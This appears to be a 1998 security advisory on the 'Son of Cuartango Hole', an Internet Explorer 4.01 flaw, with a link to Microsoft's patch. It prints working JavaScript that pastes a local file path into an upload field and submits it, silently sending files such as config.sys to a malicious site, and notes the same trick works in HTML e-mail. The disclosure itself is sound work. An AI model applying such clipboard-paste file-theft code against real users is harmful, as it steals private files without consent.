The Son of Cuartango Hole
http://pages.whowhere.com/computers/cuartangojc/son1.html

Affected software

Microsoft Internet Explorer 4.01

Fixes

Microsoft has released a fix: Microsoft Security Site, http://www.microsoft.com/security/bulletins/ms98-015.asp

Microsoft names the vulnerability "Untrusted Scripted Paste". They have created a new USP patch.

Technical description

There is an input form field used to transfer files from the browsing computer to a web site. This input field is HTML coded as:

Theoretically this input field can be filled only by the user, by clicking a "Browse" button or by typing the file name. To avoid a security hole, scripts are not allowed to modify the value of this input field, so the statement below will not work:

    document.forms[0].filename.value = "C:\\config.sys";

The Cuartango Hole revealed that a single scripted "copy and paste" operation could write a file name into the input field; Microsoft's old USP patch fixed this single "copy and paste" vulnerability.

There is a workaround that makes the "paste" operation work again. The idea is: create a "textrange" object from the selection of the file input, and then paste over this "textrange" object. The code below is a bit more sophisticated than the "Cuartango Hole" code. T1 is a hidden input field, defined in a second form, containing the file pathname to be copied to the clipboard.

    function getfile() {
        // copy the pathname held in the hidden field T1 to the clipboard
        document.forms[1].T1.select();
        document.execCommand("copy");
        // select the file input, wrap the selection in a TextRange and paste over it
        document.forms[0].filename.select();
        var rng = document.selection.createRange();
        rng.execCommand("paste");
        // submit the form, which uploads the file now named in the field
        document.forms[0].submit();
    }

The result is that the file is POSTed to the malicious web site defined in the form's action property. Similar code will also work inside an HTML-formatted e-mail.

The Cuartango Hole code was very similar:

    function getfile() {
        document.forms[1].T1.select();
        document.execCommand("copy");
        document.forms[0].filename.select();
        document.execCommand("paste");
        document.forms[0].submit();
    }

Example exploit

The Son of Cuartango Hole Test
Last update 1998 Nov 15, Year of Our Lord 1998